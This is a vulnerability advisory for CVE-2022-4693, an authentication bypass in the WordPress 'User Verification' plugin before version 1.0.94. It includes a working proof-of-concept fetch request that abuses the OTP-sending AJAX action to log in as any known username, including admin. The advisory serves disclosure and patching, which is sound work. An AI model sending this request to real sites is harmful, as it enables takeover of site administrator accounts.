User Verification < 1.0.94 – Authentication Bypass | CVE 2022-4693 | Plugin Vulnerabilities

Description

The plugin was affected by an Auth Bypass security vulnerability. To bypass authentication, we only need to know the user’s username. Depending on whose username we know, which can be easily queried because it is usually public data, we may even be given an administrative role on the website.

Proof of Concept

Exploit:

fetch('http://localhost:10008/wp-admin/admin-ajax.php', {
        method: 'POST',
        headers: new Headers({
            'Content-Type': 'application/x-www-form-urlencoded',
        }),
        body: 'action=user_verification_send_otp&user_login=admin'
    }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));

Affects Plugins

user-verification

Fixed in 1.0.94

References

CVE

URL

https://lana.codes/lanavdb/eeabe1d3-6f64-400a-8fb2-0865efdf6957

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Lana Codes

Submitter

Lana Codes

Submitter website

https://lana.codes/

Submitter twitter

Verified

Yes

WPVDB ID

1eee10a8-135f-4b76-8289-c381ff1f51ea

Timeline

Publicly Published

2022-12-28 (about 1 years ago)

Added

2022-12-28 (about 1 years ago)

Last Updated

2022-12-28 (about 1 years ago)

Other

Published

Title

Published

2022-06-20

Title

WP OAuth Server ( Login with WordPress ) < 4.0.1 - Authentication Bypass

Published

2014-08-01

Title

LayerSlider 4.6.1 - Remote Path Traversal File Access

Published

2019-07-05

Title

WP Like Button < 1.6.4 - Auth Bypass

Published

2023-05-18

Title

BP Social Connect < 1.6.2 - Authentication Bypass

Published

2023-01-27

Title

ContentStudio < 1.2.6 - Authorisation Bypass